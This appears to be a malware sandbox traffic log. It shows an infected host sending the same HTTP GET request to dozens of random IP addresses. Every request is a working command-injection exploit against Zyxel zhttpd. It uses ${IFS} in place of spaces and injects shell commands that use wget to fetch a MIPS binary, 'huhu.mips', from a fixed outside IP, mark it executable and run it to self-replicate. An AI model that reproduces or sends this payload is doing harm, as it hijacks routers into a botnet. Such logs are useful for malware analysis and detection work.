                                                Jan 29, 2024 07:07:34.019366026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                779192.168.2.235259847.151.79.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019407034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                780192.168.2.2353326178.212.138.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019437075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                781192.168.2.2352956116.172.226.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019489050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                782192.168.2.235385245.211.125.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019516945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                783192.168.2.2357896193.251.105.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019565105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                784192.168.2.2352884140.76.85.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019593954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                785192.168.2.234200651.40.7.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019633055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                786192.168.2.233710099.61.141.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019650936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                787192.168.2.2334938206.202.39.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019679070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                788192.168.2.2335428102.228.34.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019748926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                789192.168.2.2334074116.217.61.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019788980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                790192.168.2.2336408123.165.205.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019843102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                791192.168.2.2340964101.231.176.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019891977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                792192.168.2.2343852143.141.234.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019915104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                793192.168.2.235388044.185.225.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019973993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                794192.168.2.2348200162.237.121.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019975901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                795192.168.2.23477642.48.176.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020031929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                796192.168.2.236086477.179.100.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020064116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                797192.168.2.2359100222.195.15.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020109892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                798192.168.2.2360848213.14.1.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020159006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                799192.168.2.234432689.210.138.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020170927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                800192.168.2.2351552182.153.167.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020237923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                801192.168.2.234944271.215.220.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020273924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                802192.168.2.235499061.190.253.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020312071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                803192.168.2.2358286178.126.68.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020353079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                804192.168.2.234228267.0.139.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020384073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                805192.168.2.233388073.177.59.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020417929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                806192.168.2.235529658.162.175.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020461082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                807192.168.2.233681094.223.93.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020489931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                808192.168.2.2360356143.103.32.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020540953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                809192.168.2.236097099.102.164.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020577908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                810192.168.2.2341626204.4.222.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020623922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                811192.168.2.235088465.113.42.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020651102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                812192.168.2.2344680118.111.80.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020678043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                813192.168.2.233797661.20.51.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020739079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                814192.168.2.2356600180.136.6.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020768881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                815192.168.2.233566217.91.67.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020792007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                816192.168.2.235674672.20.199.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020836115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                817192.168.2.235864443.134.143.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020872116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                818192.168.2.2335818156.12.141.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020924091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                819192.168.2.234922852.223.173.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020972013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                820192.168.2.2360568100.205.202.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.020998955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                821192.168.2.2357882209.8.85.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021023035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                822192.168.2.234530267.44.236.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021083117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                823192.168.2.2350918166.21.78.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021114111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                824192.168.2.2342822114.208.168.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021147013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                825192.168.2.2345120135.242.55.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021198034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                826192.168.2.234013634.167.246.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021245956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                827192.168.2.2347330146.176.224.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021296978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                828192.168.2.235452436.0.142.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021322012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                829192.168.2.2344686161.71.234.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021364927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                830192.168.2.2355430193.73.28.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021404028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                831192.168.2.2356882163.62.95.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021431923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                832192.168.2.2348106117.181.43.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021465063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                833192.168.2.23525128.64.234.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021488905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                834192.168.2.2334740160.5.229.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021516085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                835192.168.2.2354410182.53.75.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021575928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                836192.168.2.235923846.2.142.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021585941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                837192.168.2.233429892.181.33.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021652937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                838192.168.2.2359784216.27.236.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021689892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                839192.168.2.2340406166.90.186.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021720886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                840192.168.2.2332946161.74.162.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021747112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                841192.168.2.2343340168.185.6.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021807909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                842192.168.2.2335656199.34.20.27443
                                                TimestampBytes transferredDirectionData
